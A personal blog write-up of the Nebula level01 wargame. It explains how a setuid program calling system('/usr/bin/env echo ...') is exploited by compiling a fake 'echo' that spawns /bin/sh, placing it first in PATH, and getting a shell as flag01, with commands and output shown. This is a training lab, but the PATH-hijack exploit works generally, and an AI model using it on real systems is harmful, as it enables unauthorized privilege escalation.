Jason Turley's Website

Nebula Level01 Write Up

Nebula is a wargame from Exploit Exercises about exploiting privilege escalation vulnerabilities on Linux.

This is my write up for the second level.

Overview

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

This level provides the source code:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char \*\*argv, char \*\*envp)
{
  gid\_t gid;
  uid\_t uid;
  gid = getegid();
  uid = geteuid();
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);
  system("/usr/bin/env echo and now what?");
}

Write up

Two glaring things I noticed right away is the envp variable being passed to main, and the system function being called.

I knew that system executes whatever command it’s given, but I was unfamiliar with envp. After some googling, I found the GNU libc manual entry on it. In short, envp is a way to access a process’ environment variables. It is a relic from older Unix systems. Today, the environ is more common.

So how can these two things be combined to exploit the program? The program can be tricked to run exploit code instead of the echo command.

Failed Attempt

My first attempt was to change the echo command to do something else. So I tested to see if I could make echo run ls.

export echo='ls'
echo ./
./

This of course did not work.

Solution

After some more googling I found this excellent resource from Hackers Hut:

_The C library call `system()` can be used to execute a system command from a C program. It calls `sh` with the given string as argument. For example, if one wants to send mail from a program, one might write_

 _system("mail");_

_If a setuid root program would do this, it would be tricked immediately: the attacker would put his own executable `mail` in some directory, put that directory in front of the `PATH` and `system()` would invoke the attacker's executable. _

Now I know that I to need to write a malicious echo binary and place it in front of PATH. This can be done in a few lines of C:

#include <stdlib.h>
int main() {
    system("/bin/sh");
    return 0;
}

Compile and test:

level01@nebula:~$ gcc /tmp/shell.c -o /tmp/echo
level01@nebula:~$ /tmp/echo
sh-4.2$ whoami
level01

Add to front of PATH:

level01@nebula:~$ export PATH=/tmp:$PATH

Finally, run the setuid binary:

level01@nebula:~$ /home/flag01/flag01
sh-4.2$ whoami
flag01
sh-4.2$ getflag
You have successfully executed getflag on a target account